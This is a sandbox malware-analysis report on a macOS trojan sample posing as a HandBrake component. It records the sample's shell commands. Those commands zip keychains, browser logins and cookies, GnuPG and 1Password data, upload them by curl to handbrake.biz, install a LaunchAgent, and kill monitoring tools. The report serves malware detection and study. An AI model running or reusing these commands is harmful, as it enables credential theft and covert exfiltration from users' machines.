Analysis Report

Overview

General Information

Joe Sandbox Version: 19.0.0
Analysis ID: 37267
Start time: 16:25:03
Joe Sandbox Product: Cloud
Start date: 09.05.2017
Overall analysis duration: 0h 11m 19s
Report type: full
Sample file name: activity_agent.app.zip
Cookbook file name: default.jbs
Analysis system description: Mac Mini, El Capitan 10.11.6 (MS Office 15.25, Java 1.8.0_25)
Detection: MAL
Classification: mal100.troj.adwa.spyw.expl.evad.macZIP@0/37@27/0


Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Reporting: Report FP / FN
Detection: malicious


Signature Overview

Cryptography:

Executes the "openssl" command used for cryptographic operations
Source: /bin/sh (PID: 581) Openssl executable: /usr/bin/openssl -> openssl rsautl -verify -in /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/.tmpdata -pubin -inkey /tmp/public.pem
Source: /bin/sh (PID: 598) Openssl executable: /usr/bin/openssl -> openssl rsautl -verify -in /tmp/au -pubin -inkey /tmp/au.pub
Writes files containing public keys to disk
Source: /bin/sh (PID: 580) File created 'PUBLIC KEY' pattern: /private/tmp/public.pem
Source: /bin/sh (PID: 595) File created 'PUBLIC KEY' pattern: /private/tmp/au.pub
Source: /bin/cp (PID: 663) File created 'PUBLIC KEY' pattern: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent
Source: /usr/libexec/DeveloperTools/codesign_allocate (PID: 677) File created 'PUBLIC KEY' pattern: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent.cstemp

Networking:

Performs DNS lookups
Source: unknown DNS traffic detected: queries for: script.google.com
Reads from file descriptors related to (network) sockets
Source: /usr/bin/curl (PID: 586) Reads from socket in process:
Source: /usr/bin/curl (PID: 597) Reads from socket in process:
Source: /usr/bin/curl (PID: 669) Reads from socket in process:
Uses HTTPS
Source: unknown Network traffic detected: HTTP traffic on port 49295 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49294 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49296 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49297 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49297
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49296
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49295
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49294
Writes from file descriptors related to (network) sockets
Source: /usr/bin/curl (PID: 586) Writes from socket in process:
Source: /usr/bin/curl (PID: 597) Writes from socket in process:
Source: /usr/bin/curl (PID: 669) Writes from socket in process:
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.0.50:49293 -> 8.8.8.8:53
Executes the "nc" (netcat) command used to establish arbitrary TCP or UDP connections and listens
Source: /bin/sh (PID: 583) Netcat executable: /usr/bin/nc -> nc -G 20 -z 8.8.8.8 53
Queries random domain names (often used to prevent blacklisting and sinkholes)
Source: unknown DNS traffic detected: English language letter occurrence does not match the domain names
Tries to resolve many domain names, but no domain seems valid
Source: unknown DNS traffic detected: query: script.google.com reply code: Name error (3)
Source: unknown DNS traffic detected: query: script.googleusercontent.com reply code: Name error (3)
Source: unknown DNS traffic detected: query: handbrake.biz reply code: Name error (3)
Source: unknown DNS traffic detected: query: handbrake.cc reply code: Server failure (2)
Source: unknown DNS traffic detected: query: luwenxdsnhgfxckcjgxvtugj.com reply code: Name error (3)
Source: unknown DNS traffic detected: query: 6gmvshjdfpfbeqktpsde5xav.com reply code: Name error (3)
Source: unknown DNS traffic detected: query: kjfnbfhu7ndudgzhxpwnnqkc.com reply code: Name error (3)
Source: unknown DNS traffic detected: query: yaxw8dsbttpwrwlq3h6uc9eq.com reply code: Name error (3)
Source: unknown DNS traffic detected: query: qrtfvfysk4bdcwwwe9pxmqe9.com reply code: Name error (3)
Source: unknown DNS traffic detected: query: fyamakgtrrjt9vrwhmc76v38.com reply code: Name error (3)
Source: unknown DNS traffic detected: query: kcdjzquvhsua6hlfbmjzkzsb.com reply code: Name error (3)
Source: unknown DNS traffic detected: query: ypu4vwlenkpt29f95etrqllq.com reply code: Name error (3)

System Summary:

Classification label
Source: classification engine Classification label: mal100.troj.adwa.spyw.expl.evad.macZIP@0/37@27/0

Data Obfuscation:

Imports the IOKit library (often used to register services)
Source: initial sample Static MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
Imports the Security library (often used for certificate, key, keychain, or secure transport handling)
Source: initial sample Static MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security

Persistence and Installation Behavior:

Creates application bundles containing icon files
Source: /bin/cp (PID: 663) Icon file created: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/h.icns
Executes the "sed" command used to modify input streams (usually from files or pipes)
Source: /bin/sh (PID: 635) Sed executable: /usr/bin/sed -> sed s/^Path=//
Source: /bin/sh (PID: 641) Sed executable: /usr/bin/sed -> sed s/^Path=//
Source: /bin/sh (PID: 647) Sed executable: /usr/bin/sed -> sed s/^Path=//
Source: /bin/sh (PID: 653) Sed executable: /usr/bin/sed -> sed s/^Path=//
Source: /bin/sh (PID: 673) Sed executable: /usr/bin/sed -> sed -i -e s/P_MBN/fr.handbrake.activity_agent/g /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 674) Sed executable: /usr/bin/sed -> sed -i -e s=P_UPTH=/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent=g /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Reads data from the local random generator
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) Random device file read: /dev/random
Source: /usr/bin/openssl (PID: 581) Random device file read: /dev/urandom
Source: /usr/bin/curl (PID: 586) Random device file read: /dev/random
Source: /usr/bin/curl (PID: 597) Random device file read: /dev/random
Source: /usr/bin/openssl (PID: 598) Random device file read: /dev/urandom
Source: /usr/bin/zip (PID: 627) Random device file read: /dev/random
Source: /usr/bin/zip (PID: 655) Random device file read: /dev/random
Source: /usr/bin/zip (PID: 658) Random device file read: /dev/random
Source: /usr/bin/curl (PID: 669) Random device file read: /dev/random
Uses AppleKeyboardLayouts bundle containing keyboard layouts
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Writes property list (.plist) files to disk
Source: /bin/cp (PID: 663) XML plist file created: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Info.plist
Source: /bin/cp (PID: 663) Binary plist file created: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/MainMenu.nib
Changes permissions of written Mach-O files
Source: /bin/cp (PID: 663) Permissions modified for written 64-bit Mach-O /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent: bits: - usr: rx grp: rx all: rwx
Source: /usr/bin/codesign (PID: 676) Permissions modified for written 64-bit Mach-O /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent.cstemp: bits: - usr: rx grp: rx all: rwx
Creates application bundles
Source: /bin/cp (PID: 663) Bundle Info.plist file created: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Info.plist
Creates hidden files, links and/or directories
Source: /bin/cp (PID: 663) Hidden file created: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/.hash
Source: /bin/cp (PID: 663) Hidden file created: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/.tmpdata
Source: /usr/bin/touch (PID: 670) Hidden file created: /Users/vreni/Library/VideoFrameworks/.ptrun
Source: /bin/sh (PID: 671) Hidden file created: /Users/vreni/Library/VideoFrameworks/.crd
Executes commands using a shell command-line interpreter
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c echo '-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwUP19DdW2NlkkdovqqwF+r3sBaamka42zVMGa+COUCIysrVhVJIv4nmc57TLxgG8dsg+G0o0NQ75n898b04lYGve3gXGWJ8Y5OTJ16+RA4OtKAiO8v7qEGnQ/QpSzrLZPU3Yd60bAltYSvCCiOdBOKhOAiag0H39F2k5ea4zxt6TNDksW/o3+HcjzA4yy+C1tp2Cr4X37O5XMVZPWpMksIXPazh91tr0TJ2VFyx4btnDPajeOzhcKUA05Wrw+hagAZnFU9Bajx3KvdTlxsVxLmRc5r3IqDAsXTHH1jpmWMDiC9IGLDFPrN6NffAwjgSmsKhi1SC8yFHh0oPCswRhrQIDAQAB-----END PUBLIC KEY-----' > /tmp/public.pem openssl rsautl -verify -in /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/.tmpdata -pubin -inkey /tmp/public.pem
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c nc -G 20 -z 8.8.8.8 53 >/dev/null 2>&1 && echo success
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c hcresult=`curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec` && echo $hcresult
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c if [ -f /Users/vreni/Library/VideoFrameworks/.ptrun ] then echo success fi
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c sudo -k
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c echo '' | sudo -S echo success
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c a90=`curl -s --connect-timeout 10 -o /tmp/au https://handbrake.biz/rsa` && echo && echo '-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Rp260Eq/1ZrGGMoHdIWvnOMvVYguY+DxDyHsgFGbYJPQOOkuwRvdyYnqqDvMFguNtQFVi5K35U6kv89aE8i2u8tY0efGwbTXLUIOCc7kCKzm6PcxmsIoDgsdndOriAfwSaKgsOYphOTrBsxuYe4W1f6gNj9cK0eicoizADsnlKInu+Im7xir+hdH58Kncs1gGTeo+QWyl3xpytjGkO2oVcfGbM7Xrgvc/ux49quE6lLNer3OlfORrGsSRoXcaaq7z6bjYB8U5oWJraD5heqGHT/FCarn/+qbwurWcpTmHCNPjr1+0K33XGKn6zYOT0mQ3kt2VmUUnKQhwUMs31tUwIDAQAB-----END PUBLIC KEY-----' > /tmp/au.pub && echo success
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c openssl rsautl -verify -in /tmp/au -pubin -inkey /tmp/au.pub
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c ping -c 1 handbrake.biz 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c ping -c 1 handbrakestore.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c ping -c 1 handbrake.cc 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c ping -c 1 luwenxdsnhgfxckcjgxvtugj.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c ping -c 1 6gmvshjdfpfbeqktpsde5xav.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c ping -c 1 kjfnbfhu7ndudgzhxpwnnqkc.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c ping -c 1 yaxw8dsbttpwrwlq3h6uc9eq.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c ping -c 1 qrtfvfysk4bdcwwwe9pxmqe9.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c ping -c 1 fyamakgtrrjt9vrwhmc76v38.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c ping -c 1 kcdjzquvhsua6hlfbmjzkzsb.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c ping -c 1 ypu4vwlenkpt29f95etrqllq.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c mkdir -p /Users/vreni/Library/RenderFiles /Users/vreni/Library/VideoFrameworks ~/Library/LaunchAgents/ chmod -R 777 /Users/vreni/Library/RenderFiles /Users/vreni/Library/VideoFrameworks zip -r /Users/vreni/Library/VideoFrameworks/KC.zip ~/Library/Keychains/ /Library/Keychains/ zip /Users/vreni/Library/VideoFrameworks/CR.zip ~/Library/Application\ Support/Google/Chrome/Profile\ 1/Login\ Data ~/Library/Application\ Support/Google/Chrome/Profile\ 1/Cookies ~/Library/Application\ Support/Google/Chrome/Profile\ 1/Bookmarks ~/Library/Application\ Support/Google/Chrome/Profile\ 1/History ~/Library/Application\ Support/Google/Chrome/Profile\ 1/Web\ Data zip /Users/vreni/Library/VideoFrameworks/CR_def.zip ~/Library/Application\ Support/Google/Chrome/Default/Login\ Data ~/Library/Application\ Support/Google/Chrome/Default/Cookies ~/Library/Application\ Support/Google/Chrome/Default/Bookmarks ~/Library/Application\ Support/Google/Chrome/Default/History ~/Library/Application\ Support/Google/Chrome/Default/W
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c cp -R /Users/vreni/Desktop/unpack/activity_agent.app /Users/vreni/Library/RenderFiles/activity_agent.app mv /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent mv /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/Info_.plist /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Info.plist mv /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/fr.handbrake.activity_agent.plist ~/Library/LaunchAgents/fr.handbrake.activity_agent.plist echo success
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c a1494347197=`curl -s -F full_name='vreni' -F username='vreni' -F password='' -F root_password='failure' -F serial='C07N355HDWYL' -F hostname='vreni%E2%80%99s Mac mini' -F signed='0' -F file='@/Users/vreni/Library/VideoFrameworks/proton.zip' -F api_key=9fe4a0c3b63203f096ef65dc98754243979d6bd58fe835482b969aabaaec57ea -F cts=1494347197 -F signature=77aa1c7aafbc61542eb30c0f1a1cb7f29c68adcaf5dbaa73561688d648c4f7b6 https://handbrake.biz/api/init` echo $a1494347197
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c touch /Users/vreni/Library/VideoFrameworks/.ptrun
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c echo 'vreni::59786d197c6e371c157dffe729774a4009357f5771e09e116e7e47814412661a96d8eee899399a89a005ab084dd231d25d11bde5e94d557a4b4ba965c44a4e53' > /Users/vreni/Library/VideoFrameworks/.crd
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Shell command executed: /bin/sh -c sed -i -e 's/P_MBN/fr.handbrake.activity_agent/g' ~/Library/LaunchAgents/fr.handbrake.activity_agent.plist sed -i -e 's=P_UPTH=/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent=g' ~/Library/LaunchAgents/fr.handbrake.activity_agent.plist chmod 644 ~/Library/LaunchAgents/fr.handbrake.activity_agent.plist codesign --remove-signature /Users/vreni/Library/RenderFiles/activity_agent.app rm -rf /Users/vreni/Library/RenderFiles/activity_agent.app/Ic* launchctl load ~/Library/LaunchAgents/fr.handbrake.activity_agent.plist killall Console killall Wireshark rm -rf /Users/vreni/Desktop/unpack/activity_agent.app
Executes the "chmod" command used to modify permissions
Source: /bin/sh (PID: 626) Chmod executable: /bin/chmod -> chmod -R 777 /Users/vreni/Library/RenderFiles /Users/vreni/Library/VideoFrameworks
Source: /bin/sh (PID: 675) Chmod executable: /bin/chmod -> chmod 644 /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Executes the "curl" command used to transfer data via the network (usually using HTTP/S)
Source: /bin/sh (PID: 586)Curl executable: /usr/bin/curl -> curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
Source: /bin/sh (PID: 597)Curl executable: /usr/bin/curl -> curl -s --connect-timeout 10 -o /tmp/au https://handbrake.biz/rsa
Source: /bin/sh (PID: 669)Curl executable: /usr/bin/curl -> curl -s -F full_name=vreni -F username=vreni -F password= -F root_password=failure -F serial=C07N355HDWYL -F hostname=vreni%E2%80%99s Mac mini -F signed=0 -F file=@/Users/vreni/Library/VideoFrameworks/proton.zip -F api_key=9fe4a0c3b63203f096ef65dc98754243979d6bd58fe835482b969aabaaec57ea -F cts=1494347197 -F signature=77aa1c7aafbc61542eb30c0f1a1cb7f29c68adcaf5dbaa73561688d648c4f7b6 https://handbrake.biz/api/init
Executes the "grep" command used to find patterns in files or piped streams
Source: /bin/sh (PID: 632) Grep executable: /usr/bin/grep -> grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 634) Grep executable: /usr/bin/grep -> grep Path= profiles.ini
Source: /bin/sh (PID: 638) Grep executable: /usr/bin/grep -> grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 640) Grep executable: /usr/bin/grep -> grep Path= profiles.ini
Source: /bin/sh (PID: 644) Grep executable: /usr/bin/grep -> grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 646) Grep executable: /usr/bin/grep -> grep Path= profiles.ini
Source: /bin/sh (PID: 650) Grep executable: /usr/bin/grep -> grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 652) Grep executable: /usr/bin/grep -> grep Path= profiles.ini
Executes the "mkdir" command used to create folders
Source: /bin/sh (PID: 625) Mkdir executable: /bin/mkdir -> mkdir -p /Users/vreni/Library/RenderFiles /Users/vreni/Library/VideoFrameworks /Users/vreni/Library/LaunchAgents/
Executes the "ping" command used for connectivity testing via ICMP
Source: /bin/sh (PID: 600) Ping executable: /sbin/ping -> ping -c 1 handbrake.biz
Source: /bin/sh (PID: 604) Ping executable: /sbin/ping -> ping -c 1 handbrakestore.com
Source: /bin/sh (PID: 606) Ping executable: /sbin/ping -> ping -c 1 handbrake.cc
Source: /bin/sh (PID: 609) Ping executable: /sbin/ping -> ping -c 1 luwenxdsnhgfxckcjgxvtugj.com
Source: /bin/sh (PID: 611) Ping executable: /sbin/ping -> ping -c 1 6gmvshjdfpfbeqktpsde5xav.com
Source: /bin/sh (PID: 613) Ping executable: /sbin/ping -> ping -c 1 kjfnbfhu7ndudgzhxpwnnqkc.com
Source: /bin/sh (PID: 615) Ping executable: /sbin/ping -> ping -c 1 yaxw8dsbttpwrwlq3h6uc9eq.com
Source: /bin/sh (PID: 617) Ping executable: /sbin/ping -> ping -c 1 qrtfvfysk4bdcwwwe9pxmqe9.com
Source: /bin/sh (PID: 619) Ping executable: /sbin/ping -> ping -c 1 fyamakgtrrjt9vrwhmc76v38.com
Source: /bin/sh (PID: 621) Ping executable: /sbin/ping -> ping -c 1 kcdjzquvhsua6hlfbmjzkzsb.com
Source: /bin/sh (PID: 623) Ping executable: /sbin/ping -> ping -c 1 ypu4vwlenkpt29f95etrqllq.com
Executes the "touch" command used to create files or modify time stamps
Source: /bin/sh (PID: 670) Touch executable: /usr/bin/touch -> touch /Users/vreni/Library/VideoFrameworks/.ptrun
Explicitly loads/starts launch services
Source: /bin/sh (PID: 679) Launch agent/daemon loaded: launchctl load /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Reads launchservices plist files
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices.plist
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Reads user launchservices plist file containing default apps for corresponding filetypes
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) Preferences launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Uses Security framework containing interfaces for system-level user authentication and authorization
Source: /usr/bin/codesign (PID: 676) Security framework info plist opened: /System/Library/Frameworks/Security.framework/Resources/Info.plist
Writes 64-bit Mach-O files to disk
Source: /bin/cp (PID: 663) File written: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent
Source: /usr/libexec/DeveloperTools/codesign_allocate (PID: 677) File written: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent.cstemp
Writes ZIP files to disk
Source: /usr/bin/zip (PID: 627) ZIP file created: /Users/vreni/Library/VideoFrameworks/zihaRvzn
Source: /usr/bin/zip (PID: 655) ZIP file created: /Users/vreni/Library/VideoFrameworks/ziSznLAI
Source: /usr/bin/zip (PID: 658) ZIP file created: /Users/vreni/Library/VideoFrameworks/ziHyh3w6
Writes icon files to disk
Source: /bin/cp (PID: 663) File written: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/h.icns
Writes shell script files to disk
Source: /bin/cp (PID: 663) Shell script file created: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/mozilla.sh
Executes the "rm" command used to delete files or directories
Source: /bin/sh (PID: 661) Rm executable: /bin/rm -> rm -rf grace_period
Source: /bin/sh (PID: 678) Rm executable: /bin/rm -> rm -rf /Users/vreni/Library/RenderFiles/activity_agent.app/Ic*
Source: /bin/sh (PID: 682) Rm executable: /bin/rm -> rm -rf /Users/vreni/Desktop/unpack/activity_agent.app
Executes the "sudo" command used to execute a command as another user
Source: /bin/sh (PID: 589) Sudo executable: /usr/bin/sudo -> sudo -k
Source: /bin/sh (PID: 592) Sudo executable: /usr/bin/sudo -> sudo -S echo success
Many shell processes execute programs via execve syscall (may be indicative of malicious behaviour)
Source: /bin/sh (PID: 581)Shell process: openssl rsautl -verify -in /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/.tmpdata -pubin -inkey /tmp/public.pem
Source: /bin/sh (PID: 583)Shell process: nc -G 20 -z 8.8.8.8 53
Source: /bin/sh (PID: 586)Shell process: curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
Source: /bin/sh (PID: 589)Shell process: sudo -k
Source: /bin/sh (PID: 592)Shell process: sudo -S echo success
Source: /bin/sh (PID: 597)Shell process: curl -s --connect-timeout 10 -o /tmp/au https://handbrake.biz/rsa
Source: /bin/sh (PID: 598)Shell process: openssl rsautl -verify -in /tmp/au -pubin -inkey /tmp/au.pub
Source: /bin/sh (PID: 600)Shell process: ping -c 1 handbrake.biz
Source: /bin/sh (PID: 604)Shell process: ping -c 1 handbrakestore.com
Source: /bin/sh (PID: 606)Shell process: ping -c 1 handbrake.cc
Source: /bin/sh (PID: 609)Shell process: ping -c 1 luwenxdsnhgfxckcjgxvtugj.com
Source: /bin/sh (PID: 611)Shell process: ping -c 1 6gmvshjdfpfbeqktpsde5xav.com
Source: /bin/sh (PID: 613)Shell process: ping -c 1 kjfnbfhu7ndudgzhxpwnnqkc.com
Source: /bin/sh (PID: 615)Shell process: ping -c 1 yaxw8dsbttpwrwlq3h6uc9eq.com
Source: /bin/sh (PID: 617)Shell process: ping -c 1 qrtfvfysk4bdcwwwe9pxmqe9.com
Source: /bin/sh (PID: 619)Shell process: ping -c 1 fyamakgtrrjt9vrwhmc76v38.com
Source: /bin/sh (PID: 621)Shell process: ping -c 1 kcdjzquvhsua6hlfbmjzkzsb.com
Source: /bin/sh (PID: 623)Shell process: ping -c 1 ypu4vwlenkpt29f95etrqllq.com
Source: /bin/sh (PID: 625)Shell process: mkdir -p /Users/vreni/Library/RenderFiles /Users/vreni/Library/VideoFrameworks /Users/vreni/Library/LaunchAgents/
Source: /bin/sh (PID: 626)Shell process: chmod -R 777 /Users/vreni/Library/RenderFiles /Users/vreni/Library/VideoFrameworks
Source: /bin/sh (PID: 627)Shell process: zip -r /Users/vreni/Library/VideoFrameworks/KC.zip /Users/vreni/Library/Keychains/ /Library/Keychains/
Source: /bin/sh (PID: 628)Shell process: zip /Users/vreni/Library/VideoFrameworks/CR.zip /Users/vreni/Library/Application Support/Google/Chrome/Profile 1/Login Data /Users/vreni/Library/Application Support/Google/Chrome/Profile 1/Cookies /Users/vreni/Library/Application Support/Google/Chrome/Profile 1/Bookmarks /Users/vreni/Library/Application Support/Google/Chrome/Profile 1/History /Users/vreni/Library/Application Support/Google/Chrome/Profile 1/Web Data
Source: /bin/sh (PID: 629)Shell process: zip /Users/vreni/Library/VideoFrameworks/CR_def.zip /Users/vreni/Library/Application Support/Google/Chrome/Default/Login Data /Users/vreni/Library/Application Support/Google/Chrome/Default/Cookies /Users/vreni/Library/Application Support/Google/Chrome/Default/Bookmarks /Users/vreni/Library/Application Support/Google/Chrome/Default/History /Users/vreni/Library/Application Support/Google/Chrome/Default/Web Data
Source: /bin/sh (PID: 631)Shell process: sh /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/mozilla.sh
Source: /bin/sh (PID: 632)Shell process: grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 634)Shell process: grep Path= profiles.ini
Source: /bin/sh (PID: 635)Shell process: sed s/^Path=//
Source: /bin/sh (PID: 637)Shell process: sh /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/mozilla.sh
Source: /bin/sh (PID: 638)Shell process: grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 640)Shell process: grep Path= profiles.ini
Source: /bin/sh (PID: 641)Shell process: sed s/^Path=//
Source: /bin/sh (PID: 643)Shell process: sh /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/mozilla.sh
Source: /bin/sh (PID: 644)Shell process: grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 646)Shell process: grep Path= profiles.ini
Source: /bin/sh (PID: 647)Shell process: sed s/^Path=//
Source: /bin/sh (PID: 649)Shell process: sh /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/mozilla.sh
Source: /bin/sh (PID: 650)Shell process: grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 652)Shell process: grep Path= profiles.ini
Source: /bin/sh (PID: 653)Shell process: sed s/^Path=//
Source: /bin/sh (PID: 654)Shell process: zip -r /Users/vreni/Library/VideoFrameworks/FF.zip /Users/vreni/Library/Application Support/Firefox//cookies.sqlite /Users/vreni/Library/Application Support/Firefox//formhistory.sqlite /Users/vreni/Library/Application Support/Firefox//logins.json /Users/vreni/Library/Application Support/Firefox//logins.json
Source: /bin/sh (PID: 655)Shell process: zip -r /Users/vreni/Library/VideoFrameworks/SF.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/Form Values
Source: /bin/sh (PID: 656)Shell process: zip -r /Users/vreni/Library/VideoFrameworks/OP.zip /Users/vreni/Library/Application Support/com.operasoftware.Opera/Login Data /Users/vreni/Library/Application Support/com.operasoftware.Opera/Cookies /Users/vreni/Library/Application Support/com.operasoftware.Opera/Web Data
Source: /bin/sh (PID: 657)Shell process: zip -r /Users/vreni/Library/VideoFrameworks/GNU_PW.zip /Users/vreni/.gnupg /Users/vreni/Library/Application Support/1Password 4 /Users/vreni/Library/Application Support/1Password 3.9
Source: /bin/sh (PID: 658)Shell process: zip -r /Users/vreni/Library/VideoFrameworks/proton.zip /Users/vreni/Library/VideoFrameworks
Source: /bin/sh (PID: 659)Shell process: killall Console
Source: /bin/sh (PID: 660)Shell process: killall Wireshark
Source: /bin/sh (PID: 661)Shell process: rm -rf grace_period
Source: /bin/sh (PID: 663)Shell process: cp -R /Users/vreni/Desktop/unpack/activity_agent.app /Users/vreni/Library/RenderFiles/activity_agent.app
